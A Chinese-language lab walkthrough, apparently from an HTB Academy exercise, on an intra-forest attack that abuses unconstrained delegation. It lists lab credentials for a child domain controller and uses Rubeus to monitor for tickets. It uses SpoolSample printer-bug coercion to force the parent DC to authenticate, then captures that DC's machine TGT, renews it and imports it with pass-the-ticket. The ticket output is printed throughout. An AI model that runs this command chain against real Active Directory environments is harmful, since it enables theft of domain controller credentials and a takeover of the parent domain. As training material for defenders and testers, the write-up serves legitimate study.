林内攻击-无约束委派

1. 实验环境

  • DC02(子域控制器)- 10.129.229.207(DHCP)/ 172.16.210.3(双网卡) dev.inlanefreight.ad
  • DC01(父域控制器)- 172.16.210.99 inlanefreight.ad
  • DC02 的账号密码:Administrator 和 HTB_@cademy_adm!
    Pasted image 20260307145558.png

2. 无约束委派

无约束委派允许服务模拟任何用户访问其他的任何资源服务。如果没有正确的配置,那么很可能导致重大安全问题
这里重点讲解域信任下的无约束委派攻击,有关无约束委派的一些内容请看无约束委派

通过 开启无约束委派的机器会保存身份认证到此机器上的用户的TGT 这个特性。我们可以进行一些跨域攻击,比如有其他域的用户访问了此计算机,那么我们可以在内存(lsass.exe进程)中获取到此用户的TGT

2.1. 使用Rubeus监控获取TGT

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\Rubeus.exe monitor /interval:5 /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs

开启监听

2.2. 打印机强制认证

利用打印机漏洞强制DC01进行认证

C:\Users\Administrator\Documents>.\SpoolSample.exe dc01.inlanefreight.ad dc02.dev.inlanefreight.ad
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
TargetServer: \\dc01.inlanefreight.ad, CaptureServer: \\dc02.dev.inlanefreight.ad
Attempted printer notification and received an invalid handle. The coerced authentication probably worked!

这里如果在winrm上操作,可能会遇到Kerberos双跳问题 而无法篡改

然后在Rubeus的监听界面可以收到到TGT

[*] 3/7/2026 7:48:03 AM UTC - Found new TGT:

  User                  :  DC01$@INLANEFREIGHT.AD  
  StartTime             :  3/7/2026 12:56:58 AM
  EndTime               :  3/7/2026 10:56:57 AM
  RenewTill             :  3/14/2026 1:56:57 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIFvDCCBbigAwIBBaEDAgEWooIEuDCCBLRhggSwMIIErKADAgEFoRIbEElOTEFORUZSRUlHSFQuQUSiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEElOTEFORUZSRUlHSFQuQUSjggRoMIIEZKADAgESoQMCAQKiggRWBIIEUnOwZ0GP/mdskEtDSegB05WLm0JI5E40SDV/pdz63PoBvUjUMFq0qBlmw3xIXvuMerOIlGH8H8pypGq/7zxxUa1zAEc29HVNfLWgy7Z34NVZ0vsgde9LL5MbVMj06xS8BtkXjmqebjVy6MWKbcfDJ37BDzPztSuCbvGPUmmQErLmNcOULZ3i5HMSIV5P/5hQDS1zAAsOrqSNS3x+jE04pYREbQcxA18cG2O/lHQg+xinYibsInWYGUHgBfd6qFp4A6fui4Hf9P9thz+foEnHKQ0Q7vzqemn2ZANehpwd6asPKKaqIRzzbDBAVrPQ76ixW2FRJpPhIXPmUlF8yXQsfixNEhAlHakOEPx9hSkhlExqaWRMc0hZYwjU53K8WW8Yx9SZpFt1zj3P82aO1gONeG61BKaYYz56skX56P79Dgf2aT9+y8zoqKq9NlqW5nAcOzuVAXHlp9lcJhyCDhs77O0Mq0P5AmCQsYQhmDWCxMe6SPx12j2n/DC5qf6XH6B+ztuNX9cPn1fWcIdS8FYHhxu1ill2yYmjS4SWnQy9iDiYcW7NW7jOC8d2Dppmp5lr/tS3TVMPLkLB0e64cYESNSYM+Z7UqFe24AiDjjMSOoymdYajk7Rc2/ot+/C4GuVVAntsAP5DP6gYJ6Lg1qtpIcpyVQxwPAS/EOY/ynZOezqzZFHkBuXxlnoiZ4UMLSnWpRGAwfp2ZGjWtZdcpeyev1i2hS9h94qQn239QgpB4Vn4uBD0BdYSjfxTSmdI1P7TR+Cjsh4Rl5zmbHu5WlxbAF6oiVKSmYvU3fYW0zYufJLKoNJVYp2V4pBPVhI9bpkBZXY3PuUh8oKssmuW6RLmZdqBEhksMH3HaH+vDxf0UvkqCsFbQes5LecU9252KvTCp+vx4ydFDujthMMpWV6Eoa71YSZRY9jslqRBvRjJcuo8kvzO15Dv606FEDlNP4nQZSstWF1bDIc3EuTEsCg4wt12TDX8i74Xt0Sq/i3bKa8BKXMkgptWyIjxsEN56ZP+qaYjK/K14fMs6EAH4MR+BhDXE5NScKfJV4suHyUFfSjtyUM2U8yVJNfb0x9IW77iWp+RXrdy93Uu0jKGu+PZF7ZRln2U6UNHIWmsl5mc18njTaM05BV0OGHi4Oa5yqhJ+rtlUPe7GhJY7lb5t85ZygLJt7V/hkFwlyiobM5hiKQHpNvMtNsJZ5uPhOMjU8H9xsrK0OlrzdX3FRsL8VkTjqpSbdbz6Fwo2KwXhWKmelUuu/ACboi6AJsWuE78RnBsHBDgqX0BLIaChiygNnOus/ejzj/Agk+K/cieI1zh5W2wu6gTK18S69vtEMyQjwQZxLPcED8CWApJZYEad8p1h6eRsIjzUPozVsS6mvDIte0exDJXPrJgKnbDwAnRl5PBC+EPyckEPkiVfmojknpMOzpNZuS50qwPV1/PTfXW3kLrMpW63ct4q2ozEdQxRJlZsy7Fo4HvMIHsoAMCAQCigeQEgeF9gd4wgduggdgwgdUwgdKgKzApoAMCARKhIgQgg9itySQraBuEuJmWX5u4MdBnSunMCH4+9LHNksvs0buhEhsQSU5MQU5FRlJFSUdIVC5BRKISMBCgAwIBAaEJMAcbBURDMDEkowcDBQBgoQAApREYDzIwMjYwMzA3MDY1NjU4WqYRGA8yMDI2MDMwNzE2NTY1N1qnERgPMjAyNjAzMTQwNjU2NTdaqBIbEElOTEFORUZSRUlHSFQuQUSpJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEElOTEFORUZSRUlHSFQuQUQ=

[*] Ticket cache size: 39

2.3. renew票据

然后为这个票据续期一下,并导入内存

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\Rubeus.exe renew /ticket:doIFvDCCBbigAwIBBaEDAgEWooIEuDCCBLRhggSwMIIErKADAgExx /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: Renew Ticket

[*] Using domain controller: DC01.INLANEFREIGHT.AD (172.16.210.99)
[*] Building TGS-REQ renewal for: 'INLANEFREIGHT.AD\DC01$'
[+] TGT renewal request successful!
[*] base64(ticket.kirbi):

      doIFvDCCBbigAwIBBaEDAgEWooIEuDCCBLRhggSwMIxxxxxxx
[+] Ticket successfully imported!

*Evil-WinRM* PS C:\Users\Administrator\Documents> klist

Current LogonId is 0:0x1d1c6b

Cached Tickets: (1)

#0>     Client: DC01$ @ INLANEFREIGHT.AD
        Server: krbtgt/INLANEFREIGHT.AD @ INLANEFREIGHT.AD
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 3/7/2026 1:53:29 (local)
        End Time:   3/7/2026 11:53:28 (local)
        Renew Time: 3/14/2026 0:56:57 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY        Kdc Called:

可以看到以及完成了导入,这是一个真实的TGT票据,不是0x4 -> S4U协议转换生成的虚拟票据,可以用与转发